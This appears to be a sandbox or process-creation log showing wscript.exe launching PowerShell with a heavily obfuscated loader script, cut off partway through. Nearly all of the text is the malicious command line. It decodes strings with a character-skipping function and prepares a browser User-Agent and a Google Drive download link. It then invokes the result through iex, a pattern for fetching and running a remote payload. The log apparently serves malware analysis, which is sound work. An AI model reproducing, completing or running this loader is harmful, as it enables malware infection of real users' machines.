Source: C:\Windows\System32\wscript.exe
Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Epidydimus = 1;$Painters21='Substrin';$Painters21+='g';Function Antimeningococcic($gejstligt){$Nosher=$gejstligt.Length-$Epidydimus;For($Antisnapper=5; $Antisnapper -lt $Nosher; $Antisnapper+=(6)){$taxmen+=$gejstligt.$Painters21.Invoke($Antisnapper, $Epidydimus);}$taxmen;}function cairned($Fremvisningen){. ($Chantors) ($Fremvisningen);}$Veteraness=Antimeningococcic 'ManitMNeph,oNringzregili.hiotlAspirlMet.raKlis,/ Un.e5Svam,. Afvi0Bryde Hjlp(ThundWFemmliKoo.dnServidAlkohoVetuswGlaiesTaare TtsluNDdfdsTOvern erhve1Ambas0 vatp.Therm0Quito;Caul Nonl WLinieiRe,ubnCarah6Feabe4Finia;Malac .apeixL,lla6Re,ro4Ungar;Pre.n NoterGastrvAgmas:bazzi1Tr.me2 Neph1Spe,l.N ter0Sev.r)Velve RepriG CelievasalcChon.kPampaorecta/Okkup2Prs,r0Radom1Entoc0Vov,d0Nonst1Hemag0,aama1 ksam FamilFUdadriRidgir NotceCh.llfCenoso .rorxCoons/ Warn1F.mte2Skede1Udgif.Ties.0Solip ';$Maskinafdelinger=Antimeningococcic 'IndviU,ablesDomineBrou,r Blok-TabifAnuculgSeksee ,ccenHandbtOutbu ';$Trngendes=Antimeningococcic ' AlpehDurditAfbrytTagliphabilsKal,i:Super/Dee,d/Feticd Showr CymoiLokalvReheae lant. Tvrfg tjsvo Flado ResogSe,iclSaf,aeSpiro.Lnpolc GilloNive mUntan/c viluPate cWa,tr?SmelteConquxSp itpSta,doServir O.ert ramp=BoldhdGeon.ogriotw IndknTromllAffreo diskaUdmand.orti&PhylliDe.rwdTaint=Nonp,1 Pinn0InddanAktivj LarmVKoombWCatalCbn.elqag.ip2 Undeq kos kNonreM.anscZ eddyzMiniakArticlAfkogk PoveAArdeaM WiseX,alinZVenge6Epit TPenge1Recla5,entrjVek,lTLevneP nder2 glycRVinhakRaakrbSamfuHPont. 
';$Skulapstavs=Antimeningococcic 'Delig>Crash ';$Chantors=Antimeningococcic 'FlymeiMasoneHash.xShei ';$Anniversariness = Antimeningococcic 'no.mae Sta,cBassoh.gpaaoUdv.k Symp% Wi,daS,mfupMisr,pMedendHa niaSystetOverfaMotst% .ryd\BadesCAnt.caBe alb .esaa,repssHuskesMalguoForesuEvolu.FungiTStatsuPoundnOpst Palae&disku&Chain cretaeRadiocSarcohBegrao Arar Anato$Divis ';cairned (Antimeningococcic 'Unim $Afvu,gHenk,lOve eoGallib PreaaExinglHilbe:LlebrT,entroFort s PahacOversaRamifn Ana aOmski=Tor i(AntalcAc.mpmIdeendTalel Nylon/rif,ec Vamb korru$ AgarA sychnWinten Phoniho otvdeltaeRudelrAvilasG lioa,kalmrBastkiAa,eknSol.reFortrsBlocks .agr)Subpr ');cairned (Antimeningococcic ' oshy$MoblegS.kofl Fac,o VocabTrst aKonomlPipin:,elchLtidssyCellanO,iefn For eBrnd dSynodsSaddelA.iata,orbrgrevesePreasnGaranedesi.s Anjo1Sku k6Black=Affal$ Kom |